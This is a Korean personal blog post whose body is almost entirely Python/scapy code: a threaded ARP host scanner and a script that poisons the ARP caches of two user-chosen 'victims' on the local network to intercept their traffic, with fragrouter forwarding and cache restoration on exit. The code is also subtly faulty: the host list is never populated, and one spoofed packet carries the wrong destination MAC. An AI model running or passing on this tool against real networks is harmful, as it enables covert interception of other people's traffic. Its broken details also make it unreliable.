본문 바로가기
Programming/Python

ARP Spoofing

by 비니화이팅 2020. 2. 24.

<scan.py>
from scapy.all import *
import threading
import os

host_list = {}
num = 0
threadLock = threading.Lock()
threads = []

def printHosts(host_list):
    print('-------------------------- HOST LIST --------------------------')
    print('NUM         IP                               MAC')
    print('---------------------------------------------------------------')
    for num in host_list:
        ip, mac = host_list[num]
        print("%d           %s                      %s" % (num, ip, mac))
    print('---------------------------------------------------------------')

def sendARP(ip):
    global host_list, num
    ans, unans = srp(Ether(dst='ff:ff:ff:ff:ff:ff') / ARP(pdst=ip), timeout=5, retry=1)
    for s, r in ans:
        threadLock.acquire()
        num = num + 1
        host_list.update()
        threadLock.release()

def scanHosts():
    for i in range(1, 256):
        ip = "192.168.0.%d" % i
        th = threading.Thread(target=sendARP, args=(ip,))
        th.start()
        threads.append(th)

    for t in threads:
        t.join()

    os.system('clear')
    printHosts(host_list)
    return host_list

 

<arp_spoofing.py>

from scan import *
from scapy.all import *
import os

def arpSpoof(vic1_ip, vic1_mac, vic2_ip, vic2_mac):
    arp1=ARP(op=2, psrc=vic1_ip, pdst=vic2_ip, hwdst=vic2_mac)
    arp2=ARP(op=2, psrc=vic2_ip, pdst=vic1_ip, hwdst=vic2_mac)
    send(arp1)
    send(arp2)

def restoreARP(vic1_ip, vic1_mac, vic2_ip, vic2_mac):
    arp1=ARP(op=2, psrc=vic1_ip, hwsrc=vic1_mac, pdst=vic2_ip, hwdst='ff:ff:ff:ff:ff:ff')
    arp2=ARP(op=2, psrc=vic2_ip, hwsrc=vic2_mac, pdst=vic1_ip, hwdst='ff:ff:ff:ff:ff:ff')
    send(arp1, count=3)
    send(arp2, count=3)

def main():
    host_list=scanHosts()
    victim1=input("Victim 1 : ")
    victim2=input("Victim 2 : ")

    print("ARP Spoofing START")

    os.system("fragrouter -B1")
    try:
        while True:
            arpSpoof(host_list[int(victim1)][0], host_list[int(victim1)][1], host_list[int(victim2)][0], host_list[int(victim2)][1])
    except KeyboardInterrupt:
        restoreARP(host_list[int(victim1)][0], host_list[int(victim1)][1], host_list[int(victim2)][0], host_list[int(victim2)][1])
        print("ARP Spoofing END")

if __name__=='__main__':
    main()
 

 

'Programming > Python' 카테고리의 다른 글

Dictionary Attack  (0) 2020.03.04
ARP를 이용한 host scan  (0) 2020.02.24
cookie를 이용한 로그인  (0) 2018.07.18
살아있는 호스트 IP 스캔하기  (0) 2018.02.13
1의 보수와 2의 보수  (2) 2017.01.20

댓글0